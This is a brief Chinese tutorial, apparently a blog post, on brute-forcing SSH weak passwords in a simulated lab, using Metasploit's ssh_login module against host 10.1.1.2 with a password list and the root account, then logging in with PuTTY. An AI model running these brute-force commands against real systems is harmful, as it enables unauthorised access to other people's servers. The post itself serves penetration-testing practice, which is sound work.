字典攻击ssh弱口令

文章目录

    • 介绍
    • 使用metasploit对目标主机进行字典攻击

介绍

SSH,Secure Shell 的缩写,由 IETF 的网络工作小组(Network Working Group)所制定;SSH 为建立在应用层和传输层基础上的安全协议。SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题.

SSH若有弱口令,则容易被挖矿程序等远程登录等等

下面模拟 msf对ssh弱口令的攻击

目标主机IP : 10.1.1.2

使用metasploit对目标主机进行字典攻击

使用的模块为 auxiliary/scanner/ssh/ssh_login

search ssh_login

字典攻击ssh弱口令_第1张图片

use auxiliary/scanner/ssh/ssh_login

show options

字典攻击ssh弱口令_第2张图片

输入set RHOSTS 10.1.1.2设置SSH主机地址,

输入set PASS_FILE c:\pass.txt设置字典文件

输入set USERNAME root设置破解的帐号名

字典攻击ssh弱口令_第3张图片

设置完成后输入run命令运行字典攻击

字典攻击ssh弱口令_第4张图片

密码 password

字典攻击ssh弱口令_第5张图片

然后可以用 如PUTTY等工具链接 10.1.1.2

字典攻击ssh弱口令_第6张图片

你可能感兴趣的:(漏洞复现,网络,ssh,安全,linux)